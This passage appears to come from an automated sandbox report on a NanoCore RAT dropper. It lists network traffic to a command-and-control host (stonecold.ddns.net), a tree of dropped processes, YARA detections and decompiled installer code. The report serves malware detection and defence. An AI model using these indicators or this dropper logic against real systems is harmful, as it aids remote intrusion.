May 17, 2022 12:14:32.523578882 CEST	49774	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:33.283515930 CEST	49774	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:37.537894964 CEST	49776	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:37.722630978 CEST	2702	49776	185.19.85.141	192.168.2.3
May 17, 2022 12:14:37.722825050 CEST	49776	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:37.723917961 CEST	49776	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:37.981085062 CEST	2702	49776	185.19.85.141	192.168.2.3
May 17, 2022 12:14:37.981204033 CEST	49776	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:38.050920963 CEST	2702	49776	185.19.85.141	192.168.2.3
May 17, 2022 12:14:38.195930958 CEST	49776	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:38.230685949 CEST	2702	49776	185.19.85.141	192.168.2.3
May 17, 2022 12:14:38.230779886 CEST	49776	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:38.420816898 CEST	2702	49776	185.19.85.141	192.168.2.3
May 17, 2022 12:14:38.420926094 CEST	49776	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:38.652760029 CEST	2702	49776	185.19.85.141	192.168.2.3
May 17, 2022 12:14:38.652894974 CEST	49776	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:38.894013882 CEST	2702	49776	185.19.85.141	192.168.2.3
May 17, 2022 12:14:38.894151926 CEST	49776	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:39.142792940 CEST	2702	49776	185.19.85.141	192.168.2.3
May 17, 2022 12:14:39.142982960 CEST	49776	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:39.408662081 CEST	2702	49776	185.19.85.141	192.168.2.3
May 17, 2022 12:14:39.410801888 CEST	49776	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:39.512757063 CEST	2702	49776	185.19.85.141	192.168.2.3
May 17, 2022 12:14:39.567863941 CEST	49776	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:39.592813015 CEST	2702	49776	185.19.85.141	192.168.2.3
May 17, 2022 12:14:39.592989922 CEST	49776	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:39.602665901 CEST	49776	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:43.676788092 CEST	49777	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:43.862670898 CEST	2702	49777	185.19.85.141	192.168.2.3
May 17, 2022 12:14:43.865611076 CEST	49777	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:43.866226912 CEST	49777	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:44.106393099 CEST	2702	49777	185.19.85.141	192.168.2.3
May 17, 2022 12:14:44.106559992 CEST	49777	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:44.153368950 CEST	2702	49777	185.19.85.141	192.168.2.3
May 17, 2022 12:14:44.153495073 CEST	49777	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:44.338848114 CEST	2702	49777	185.19.85.141	192.168.2.3
May 17, 2022 12:14:44.340656996 CEST	49777	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:44.387579918 CEST	2702	49777	185.19.85.141	192.168.2.3
May 17, 2022 12:14:44.387722015 CEST	49777	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:44.531961918 CEST	2702	49777	185.19.85.141	192.168.2.3
May 17, 2022 12:14:44.532115936 CEST	49777	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:44.634577036 CEST	2702	49777	185.19.85.141	192.168.2.3
May 17, 2022 12:14:44.634694099 CEST	49777	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:44.772831917 CEST	2702	49777	185.19.85.141	192.168.2.3
May 17, 2022 12:14:44.772947073 CEST	49777	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:44.872615099 CEST	2702	49777	185.19.85.141	192.168.2.3
May 17, 2022 12:14:45.012612104 CEST	2702	49777	185.19.85.141	192.168.2.3
May 17, 2022 12:14:45.012691975 CEST	49777	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:45.254138947 CEST	2702	49777	185.19.85.141	192.168.2.3
May 17, 2022 12:14:45.382581949 CEST	2702	49777	185.19.85.141	192.168.2.3
May 17, 2022 12:14:45.382956982 CEST	49777	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:45.572696924 CEST	2702	49777	185.19.85.141	192.168.2.3
May 17, 2022 12:14:45.574219942 CEST	49777	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:45.767270088 CEST	2702	49777	185.19.85.141	192.168.2.3
May 17, 2022 12:14:45.767412901 CEST	49777	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:45.952728033 CEST	2702	49777	185.19.85.141	192.168.2.3
May 17, 2022 12:14:45.993772984 CEST	49777	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:49.052825928 CEST	2702	49777	185.19.85.141	192.168.2.3
May 17, 2022 12:14:49.103220940 CEST	49777	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:51.202811003 CEST	2702	49777	185.19.85.141	192.168.2.3
May 17, 2022 12:14:51.415828943 CEST	49777	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:51.565047026 CEST	2702	49777	185.19.85.141	192.168.2.3
May 17, 2022 12:14:51.565119028 CEST	49777	2702	192.168.2.3	185.19.85.141

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 17, 2022 12:12:58.920829058 CEST	55923	53	192.168.2.3	8.8.8.8
May 17, 2022 12:12:58.941987991 CEST	53	55923	8.8.8.8	192.168.2.3
May 17, 2022 12:13:05.952495098 CEST	57421	53	192.168.2.3	8.8.8.8
May 17, 2022 12:13:05.972088099 CEST	53	57421	8.8.8.8	192.168.2.3
May 17, 2022 12:13:12.585015059 CEST	49873	53	192.168.2.3	8.8.8.8
May 17, 2022 12:13:12.606115103 CEST	53	49873	8.8.8.8	192.168.2.3
May 17, 2022 12:13:21.464219093 CEST	63332	53	192.168.2.3	8.8.8.8
May 17, 2022 12:13:21.485625029 CEST	53	63332	8.8.8.8	192.168.2.3
May 17, 2022 12:13:27.944885969 CEST	63548	53	192.168.2.3	8.8.8.8
May 17, 2022 12:13:27.973401070 CEST	53	63548	8.8.8.8	192.168.2.3
May 17, 2022 12:13:34.360271931 CEST	49327	53	192.168.2.3	8.8.8.8
May 17, 2022 12:13:34.379478931 CEST	53	49327	8.8.8.8	192.168.2.3
May 17, 2022 12:13:41.841485023 CEST	51391	53	192.168.2.3	8.8.8.8
May 17, 2022 12:13:41.861246109 CEST	53	51391	8.8.8.8	192.168.2.3
May 17, 2022 12:13:48.083240986 CEST	58981	53	192.168.2.3	8.8.8.8
May 17, 2022 12:13:48.100805998 CEST	53	58981	8.8.8.8	192.168.2.3
May 17, 2022 12:13:55.711556911 CEST	64452	53	192.168.2.3	8.8.8.8
May 17, 2022 12:13:55.730863094 CEST	53	64452	8.8.8.8	192.168.2.3
May 17, 2022 12:14:01.968539000 CEST	61380	53	192.168.2.3	8.8.8.8
May 17, 2022 12:14:01.985424995 CEST	53	61380	8.8.8.8	192.168.2.3
May 17, 2022 12:14:08.614901066 CEST	52985	53	192.168.2.3	8.8.8.8
May 17, 2022 12:14:08.635724068 CEST	53	52985	8.8.8.8	192.168.2.3
May 17, 2022 12:14:15.501707077 CEST	58625	53	192.168.2.3	8.8.8.8
May 17, 2022 12:14:15.521434069 CEST	53	58625	8.8.8.8	192.168.2.3
May 17, 2022 12:14:22.052812099 CEST	52810	53	192.168.2.3	8.8.8.8
May 17, 2022 12:14:22.072029114 CEST	53	52810	8.8.8.8	192.168.2.3
May 17, 2022 12:14:28.560749054 CEST	55151	53	192.168.2.3	8.8.8.8
May 17, 2022 12:14:28.580450058 CEST	53	55151	8.8.8.8	192.168.2.3
May 17, 2022 12:14:37.462311983 CEST	59795	53	192.168.2.3	8.8.8.8
May 17, 2022 12:14:37.489656925 CEST	53	59795	8.8.8.8	192.168.2.3
May 17, 2022 12:14:43.654771090 CEST	59390	53	192.168.2.3	8.8.8.8
May 17, 2022 12:14:43.675661087 CEST	53	59390	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 17, 2022 12:12:58.920829058 CEST	192.168.2.3	8.8.8.8	0x82bd	Standard query (0)	stonecold.ddns.net	A (IP address)	IN (0x0001)
May 17, 2022 12:13:05.952495098 CEST	192.168.2.3	8.8.8.8	0x5bf2	Standard query (0)	stonecold.ddns.net	A (IP address)	IN (0x0001)
May 17, 2022 12:13:12.585015059 CEST	192.168.2.3	8.8.8.8	0x9918	Standard query (0)	stonecold.ddns.net	A (IP address)	IN (0x0001)
May 17, 2022 12:13:21.464219093 CEST	192.168.2.3	8.8.8.8	0xbe9b	Standard query (0)	stonecold.ddns.net	A (IP address)	IN (0x0001)
May 17, 2022 12:13:27.944885969 CEST	192.168.2.3	8.8.8.8	0x8ee9	Standard query (0)	stonecold.ddns.net	A (IP address)	IN (0x0001)
May 17, 2022 12:13:34.360271931 CEST	192.168.2.3	8.8.8.8	0xa42d	Standard query (0)	stonecold.ddns.net	A (IP address)	IN (0x0001)
May 17, 2022 12:13:41.841485023 CEST	192.168.2.3	8.8.8.8	0xd02d	Standard query (0)	stonecold.ddns.net	A (IP address)	IN (0x0001)
May 17, 2022 12:13:48.083240986 CEST	192.168.2.3	8.8.8.8	0xe84b	Standard query (0)	stonecold.ddns.net	A (IP address)	IN (0x0001)
May 17, 2022 12:13:55.711556911 CEST	192.168.2.3	8.8.8.8	0xf82b	Standard query (0)	stonecold.ddns.net	A (IP address)	IN (0x0001)
May 17, 2022 12:14:01.968539000 CEST	192.168.2.3	8.8.8.8	0x845	Standard query (0)	stonecold.ddns.net	A (IP address)	IN (0x0001)
May 17, 2022 12:14:08.614901066 CEST	192.168.2.3	8.8.8.8	0xfe12	Standard query (0)	stonecold.ddns.net	A (IP address)	IN (0x0001)
May 17, 2022 12:14:15.501707077 CEST	192.168.2.3	8.8.8.8	0xfeee	Standard query (0)	stonecold.ddns.net	A (IP address)	IN (0x0001)
May 17, 2022 12:14:22.052812099 CEST	192.168.2.3	8.8.8.8	0x5836	Standard query (0)	stonecold.ddns.net	A (IP address)	IN (0x0001)
May 17, 2022 12:14:28.560749054 CEST	192.168.2.3	8.8.8.8	0xf6b	Standard query (0)	stonecold.ddns.net	A (IP address)	IN (0x0001)
May 17, 2022 12:14:37.462311983 CEST	192.168.2.3	8.8.8.8	0xdcc2	Standard query (0)	stonecold.ddns.net	A (IP address)	IN (0x0001)
May 17, 2022 12:14:43.654771090 CEST	192.168.2.3	8.8.8.8	0x3888	Standard query (0)	stonecold.ddns.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
May 17, 2022 12:12:58.941987991 CEST	8.8.8.8	192.168.2.3	0x82bd	No error (0)	stonecold.ddns.net	185.19.85.141	A (IP address)	IN (0x0001)
May 17, 2022 12:13:05.972088099 CEST	8.8.8.8	192.168.2.3	0x5bf2	No error (0)	stonecold.ddns.net	185.19.85.141	A (IP address)	IN (0x0001)
May 17, 2022 12:13:12.606115103 CEST	8.8.8.8	192.168.2.3	0x9918	No error (0)	stonecold.ddns.net	185.19.85.141	A (IP address)	IN (0x0001)
May 17, 2022 12:13:21.485625029 CEST	8.8.8.8	192.168.2.3	0xbe9b	No error (0)	stonecold.ddns.net	185.19.85.141	A (IP address)	IN (0x0001)
May 17, 2022 12:13:27.973401070 CEST	8.8.8.8	192.168.2.3	0x8ee9	No error (0)	stonecold.ddns.net	185.19.85.141	A (IP address)	IN (0x0001)
May 17, 2022 12:13:34.379478931 CEST	8.8.8.8	192.168.2.3	0xa42d	No error (0)	stonecold.ddns.net	185.19.85.141	A (IP address)	IN (0x0001)
May 17, 2022 12:13:41.861246109 CEST	8.8.8.8	192.168.2.3	0xd02d	No error (0)	stonecold.ddns.net	185.19.85.141	A (IP address)	IN (0x0001)
May 17, 2022 12:13:48.100805998 CEST	8.8.8.8	192.168.2.3	0xe84b	No error (0)	stonecold.ddns.net	185.19.85.141	A (IP address)	IN (0x0001)
May 17, 2022 12:13:55.730863094 CEST	8.8.8.8	192.168.2.3	0xf82b	No error (0)	stonecold.ddns.net	185.19.85.141	A (IP address)	IN (0x0001)
May 17, 2022 12:14:01.985424995 CEST	8.8.8.8	192.168.2.3	0x845	No error (0)	stonecold.ddns.net	185.19.85.141	A (IP address)	IN (0x0001)
May 17, 2022 12:14:08.635724068 CEST	8.8.8.8	192.168.2.3	0xfe12	No error (0)	stonecold.ddns.net	185.19.85.141	A (IP address)	IN (0x0001)
May 17, 2022 12:14:15.521434069 CEST	8.8.8.8	192.168.2.3	0xfeee	No error (0)	stonecold.ddns.net	185.19.85.141	A (IP address)	IN (0x0001)
May 17, 2022 12:14:22.072029114 CEST	8.8.8.8	192.168.2.3	0x5836	No error (0)	stonecold.ddns.net	185.19.85.141	A (IP address)	IN (0x0001)
May 17, 2022 12:14:28.580450058 CEST	8.8.8.8	192.168.2.3	0xf6b	No error (0)	stonecold.ddns.net	185.19.85.141	A (IP address)	IN (0x0001)
May 17, 2022 12:14:37.489656925 CEST	8.8.8.8	192.168.2.3	0xdcc2	No error (0)	stonecold.ddns.net	185.19.85.141	A (IP address)	IN (0x0001)
May 17, 2022 12:14:43.675661087 CEST	8.8.8.8	192.168.2.3	0x3888	No error (0)	stonecold.ddns.net	185.19.85.141	A (IP address)	IN (0x0001)

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: xeWd55M5Lb.exePID: 6384, Parent PID: 4312

General

Target ID:	0
Start time:	12:12:40
Start date:	17/05/2022
Path:	C:\Users\user\Desktop\xeWd55M5Lb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\xeWd55M5Lb.exe"
Imagebase:	0x400000
File size:	328454 bytes
MD5 hash:	F32D1F6E94DA654932E73E42F0F4773A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: jqenyeo.exePID: 6412, Parent PID: 6384

General

Target ID:	1
Start time:	12:12:41
Start date:	17/05/2022
Path:	C:\Users\user\AppData\Local\Temp\jqenyeo.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk
Imagebase:	0x400000
File size:	75776 bytes
MD5 hash:	22A5EC1E72CE0D23B1598C40639BB3B2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: NanoCore, Description: unknown, Source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 23%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6428, Parent PID: 6412

General

Target ID:	2
Start time:	12:12:42
Start date:	17/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9170000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: jqenyeo.exePID: 6500, Parent PID: 6412

General

Target ID:	3
Start time:	12:12:43
Start date:	17/05/2022
Path:	C:\Users\user\AppData\Local\Temp\jqenyeo.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk
Imagebase:	0x400000
File size:	75776 bytes
MD5 hash:	22A5EC1E72CE0D23B1598C40639BB3B2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ltqmdmdi.exePID: 6696, Parent PID: 3968

General

Target ID:	6
Start time:	12:12:56
Start date:	17/05/2022
Path:	C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe"
Imagebase:	0x400000
File size:	75776 bytes
MD5 hash:	22A5EC1E72CE0D23B1598C40639BB3B2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 23%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6768, Parent PID: 6696

General

Target ID:	8
Start time:	12:12:58
Start date:	17/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9170000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 7004, Parent PID: 6696

General

Target ID:	14
Start time:	12:13:01
Start date:	17/05/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6696 -s 628
Imagebase:	0x990000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: ltqmdmdi.exePID: 5948, Parent PID: 3968

General

Target ID:	17
Start time:	12:13:06
Start date:	17/05/2022
Path:	C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe"
Imagebase:	0x400000
File size:	75776 bytes
MD5 hash:	22A5EC1E72CE0D23B1598C40639BB3B2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5420, Parent PID: 5948

General

Target ID:	19
Start time:	12:13:07
Start date:	17/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9170000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 4588, Parent PID: 5948

General

Target ID:	21
Start time:	12:13:09
Start date:	17/05/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 608
Imagebase:	0x990000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: xeWd55M5Lb.exePID: 6384, Parent PID: 4312COMMON

Execution Graph

Execution Coverage:	15.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.4%
Total number of Nodes:	1385
Total number of Limit Nodes:	25

Executed Functions

Function 00403640 Relevance: 88.0, APIs: 34, Strings: 16, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				signed int _t216;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				char* _t232;
				signed int _t233;
				WCHAR* _t234;
				void* _t250;

				_t216 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a318 = _v324.dwBuildNumber;
				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a31e != 0x600) {
					_t179 = E00406A35(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E004069C5(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E00406A35(0xb);
				 *0x42a264 = E00406A35(9);
				_t88 = E00406A35(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a31c =  *0x42a31c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x42a320 = _t88;
				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
				E00406668(0x429260, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t232 = L"\"C:\\Users\\hardz\\Desktop\\xeWd55M5Lb.exe\" ";
				E00406668(_t232, _t92);
				_t94 = _t232;
				_t233 = 0x22;
				 *0x42a260 = 0x400000;
				_t250 = L"\"C:\\Users\\hardz\\Desktop\\xeWd55M5Lb.exe\" " - _t233; // 0x22
				if(_t250 == 0) {
					_t216 = _t233;
					_t94 =  &M00435002;
				}
				_t198 = CharNextW(E00405F64(_t94, _t216));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405F64(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t198);
										L37:
										_t234 = L"C:\\Users\\hardz\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E0040360F(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x42a2f4 == _t188) {
														L77:
														_t119 =  *0x42a30c;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E00406A35(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CC8(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a27c == _t188) {
												L51:
												 *0x42a30c =  *0x42a30c | 0xffffffff;
												_v24 = E00403D17(_t264);
												goto L68;
											}
											_t218 = E00405F64(L"\"C:\\Users\\hardz\\Desktop\\xeWd55M5Lb.exe\" ", _t188);
											if(_t218 < L"\"C:\\Users\\hardz\\Desktop\\xeWd55M5Lb.exe\" ") {
												L48:
												_t263 = _t218 - L"\"C:\\Users\\hardz\\Desktop\\xeWd55M5Lb.exe\" ";
												_v8 = L"Error launching installer";
												if(_t218 < L"\"C:\\Users\\hardz\\Desktop\\xeWd55M5Lb.exe\" ") {
													_t189 = E00405C33(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t137 = lstrcmpiW(_t234, 0x436800);
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405C16();
														} else {
															E00405B99();
														}
														SetCurrentDirectoryW(_t234);
														__eflags = L"C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", 0x436800);
														}
														E00406668(0x42b000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x42b800 = _t143;
														do {
